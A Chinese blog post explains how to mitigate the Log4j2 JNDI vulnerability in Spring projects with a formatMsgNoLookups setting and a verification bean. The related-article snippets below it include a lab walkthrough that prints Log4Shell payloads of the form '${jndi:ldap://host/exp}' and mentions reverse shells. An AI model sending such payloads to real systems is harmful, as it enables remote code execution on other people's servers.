spring 项目 Log4j2 JNDI 漏洞修复

最新推荐文章于 2024-04-19 20:14:12 发布
最新推荐文章于 2024-04-19 20:14:12 发布
阅读量1.7k 收藏
点赞数
文章标签: elasticsearch java spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cloudcsdn88/article/details/121912761
版权 

# spring 项目 Log4j2 JNDI 漏洞修复

针对有直接依赖或者间接依赖(引用其他中间件:elasticsearch、druid、nacos等)Log4j 2.x <= 2.14.1 之间的版本。

#### 一、修复办法

resources文件夹下新建 log4j2.component.properties配置文件。具体内容如下:

```properties
log4j2.formatMsgNoLookups = true

针对远程网络攻击

二、检查是否生效

新建测试bean 进行验证,代码如下:

package com.hanbingbbs.controller;

import org.springframework.beans.factory.InitializingBean;
import org.springframework.stereotype.Component;

import static org.apache.logging.log4j.core.util.Constants.FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS;


@Component
public class Log4jFormatMsgNoLookupsCheck implements InitializingBean {
    @Override
    public void afterPropertiesSet() throws Exception {
        System.out.println(FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS);
    }
}


不同版本可能存在差异,如项目中使用的log4j 的参数配置  不在 org.apache.logging.log4j.core.util.Constants,可根据源码具体分析。
cloudcsdn88
关注
JNDI注入的理解、JDK给出的修复
qq_37432174的博客
11-24 685
攻击目标扮演的相当于是JNDI客户端的角色,攻击者通过搭建一个恶意的RMI服务端来实施攻击。Context.PROVIDER_URL参数表示指定一个远程加载的地址,例如上面的rmi://127.0.0.1:8080,当我们通过lookup函数进行查找对象的时候,其实就是在rmi://127.0.0.1:1099/m1sn0w这个里面进行的查找。当然,如果受害者内部存在漏洞组件存在反序列化漏洞的话,我们可以构造恶意的序列化对象,返回给客户端,当客户端在进行反序列化的时候,可以触发漏洞
CDH/HDP/CDP等大数据平台中如何快速应对LOG4J的JNDI系列漏洞
明哥的IT随笔
01-01 1128
大家好,我是明哥!近期 LOG4J 围绕JNDI的安全漏洞频繁暴雷,着实让小伙伴们忙活了一阵。本文我们就一起来看下,CDH/HDP/CDP 等大数据平台中如何快速应对 LOG4J 的 JN...
log4j关于JNDI注入漏洞验证及修复
影子的博客
12-11 7688
log4j关于JNDI注入漏洞验证及修复一、漏洞说明二、漏洞检测方案三、影响范围四、影响组件五、彻底解决方案六、临时缓解方案七、漏洞复现八、本地编译log4j-2.15.0-rc版本方法1、下载源码2、安装JDK8、9、11。3、用idea打开源码4、修改toolchains-sample-win.xml文件的JDK安装路径5、修改maven的conf目录下的toolchains.xml文件,设置java11的安装路径6、编译安装到本地仓库 一、漏洞说明 漏洞原理官方表述:Apache Log4j2 中存在
Log4j2漏洞修复
running_pork的博客
12-16 3179
文章目录一、漏洞二、修复漏洞2.1 SpringMVC项目修复2.2 SpringBoot项目修复三、如何攻击漏洞 一、漏洞 近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系
Spring Boot restart logging.config logback JNDI RCE漏洞复现
Bird&Bird
03-13 983
但为了让程序不抛错退出,需要针对性的修改用到的代码,比如修改 JNDIExploit/src/main/java/com/feihong/ldap/template/CommandTemplate.java 文件,让其返回的 class 字节码继承 javax.naming.spi.ObjectFactory 接口。⚠️ JNDI 服务返回的 object 需要实现 javax.naming.spi.ObjectFactory 接口,否则会导致程序异常退出。
Spring Boot 应对 Log4j2 注入漏洞指南
u014389734的博客
12-31 253
Log4J2漏洞涉及的影响太广了,昨天发文后很多粉丝留言问Spring Boot项目是否受到Log4J2漏洞影响。Spring官方已经全面进行了排查,现在大家可以知道这些信息和应对方法。 默认配置不受影响 Spring Boot默认日志组件是logback,开发者通过日志门面Slf4j进行集成对接。Spring Boot 用户只有在将默认日志系统切换到 Log4J2 时才会受到此漏洞的影响。Spring Boot包含的log4j-to-slf4j和log4j-api、spring-boot-start
Apache Log4j2.x RCE命令执行漏洞攻击原理及修复措施
wangpf2011的博客
12-23 3896
截止2021.12.20,短短几天Log4j2.x已经连发3个版本,用以修复RCE命令执行漏洞Log4j2漏洞总体来说是通过JNDI注入恶意代码来完成攻击,具体的操作方式有RMI和LDAP等。 一、攻击原理 以RMI为例,简单阐述下该漏洞的攻击原理: 1、攻击者首先发布一个RMI服务,此服务将绑定一个引用类型的RMI对象。在引用对象中指定一个远程的含有恶意代码的类。 2、攻击者再发布另一个恶意代码下载服务,此服务可以下载所有含有恶意代码的类。 3、攻击者利用Log4j2漏洞注入RMI调用,
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1724
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
全网连夜修复的Log4j漏洞,如何做
最新发布
2401_84047990的博客
04-19 1023
同时也并不是完全没有缺点,主要的问题就是可能带来一定的性能损耗。还有就是开发难度比较高,需要对 JVM 字节码、ASM 工具、漏洞触发原理以及各类Java 应用容器都有所了解。RASP技术目前已经非常成熟,在PHP、Java、.NET等多种语言中都有实现方案。
关于springboot项目日志框架默认使用slf4j时是否需要处理log4j-JNDI注入漏洞的说明
qq_41419769的博客
12-16 4262
可以看到log4j-api是被log4j-to-slf4j引用的,log4j-to-slf4j是被spring-boot-starter-logging引用的,spring-boot-starter-logging是被spring-boot-starter引用的,最终的spring-boot-starter是在pom.xml中引用的 通过各种查阅资料,最终我了解到,此处默认使用slf4j+logback的方式来记录日志,并没有使用log4j、log4j2等日志框架,故不存在log4j-JNDI注入漏洞
Spring 框架相关漏洞详解合集
zjjcchina的博客
01-19 4475
虽说是 Spring 框架漏洞,但以下包含并不仅 Spring Framework,Spring Boot,还有 Spring Cloud,Spring Data,Spring Security 等。 CVE-2010-1622 Spring Framework class.classLoader 类远程代码执行 影响版本:SpringSource Spring Framework 3.0.0 - 3.0.2、SpringSource Spring Framework 2.5.0 - 2.5.7
java/spring 等相关框架 漏洞原理汇总
FREEDOM
03-31 1360
JNDI 中的 rmi或ldap 所造成漏洞 rmi 客户端与服务端之间 传输的是序列化后的类实例对象,然后在客户端在反序列化生成对象,并初始化调用构造方法。 ldap 协议也会造成本地执行远程class文件的问题,不同与rmi,ldap 会加载远程class类文件到本进行实例化构造方法!!! 参考:https://liuhuiyao.blog.csdn.net/article/details/121877227 log4j的 jndi漏洞 log4j-2.x 版本jndi漏洞(使用ldap协议.
Log4j2 Jndi 漏洞原理解析
课嗨教育的专栏
01-01 2573
漏洞解析、复现 Log4j2的框架设计非常优秀,各种功能均是以内部插件的方式进行的扩展实现,比如我们经常在Xml中定义的<Appenders>,实际对应的则是如下的AppendersPlugin对象 而我们在Xml Appenders下所定义的<Console>实际对应的则是如下的ConsoleAppender对象 看到这里应该就知晓了,我们在配置文件中所配置的各种元素实际上对应的均是Log4j2中的各种插件对象,Xml在被解析过程当中,会将你所配置的各种元素名..
Weblogic Server JNDI命令执行漏洞复现,一线互联网架构师筑基必备技能之网络安全篇
2401_84184638的博客
04-10 983
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
springboot jndi禁用
分享牛
11-15 1万+
摘要:在实际项目开发中使用springboot的时候,可以使用jar包的方式运行项目,也可以将springboot项目打成war包使用。springboot war包运行可能会出现 [localhost-startStop-1] DEBUG org.springframework.jndi.JndiLocatorDelegate - Converted JNDI name [java:comp/e
JNDI配置连接池问题-Too many connections
梦凝哲雪
03-20 2072
Eclipse配置JNDI连接池 JNDI就是(JavaNaming and Directory Inteface)Java名称目录接口 概念参考-JNDI 的理解 1、预加载连接池时出错 2、数据源拒绝建立连接,来自服务器的消息:“连接太多” java.sql.SQLException: Error preloading the connection pool Caused by: java.sql.SQLNonTransientConnectionException: Data source rej
SpringBoot漏洞大全
yggcwhat
05-28 1万+
SpringBoot漏洞大全
深入理解JNDI注入与Java反序列化漏洞利用
3569
08-04 1万+
rmi 和 jndi 这些概念,一直接触,但是看了会儿 还是略微懵逼,这篇文章 暂时理清了我的思路 [承上启下]----------------------------------上边属于我自己瞎扯的,下边是kingx大佬写的---------------------------------[承上启下] 在Java反序列化漏洞挖掘或利用的时候经常会遇到RMI、JNDI、JRM...
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现
热门推荐
LiBai'S BLOG
01-05 2万+
这里写目录标题VuofocusDnslog出网测试JNDI注入反弹shell Vuofocus http://vulfocus.fofa.so/ 启动靶场 Dnslog出网测试 http://www.dnslog.cn/ payload GET方式提交 payload payload=${jndi:ldap://X.X.X.X/exp} payload=${jndi:ldap://5e0s0v.dnslog.cn/exp} 用payload打的时候发现服务器返回404 原因是因为GET数据传输
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值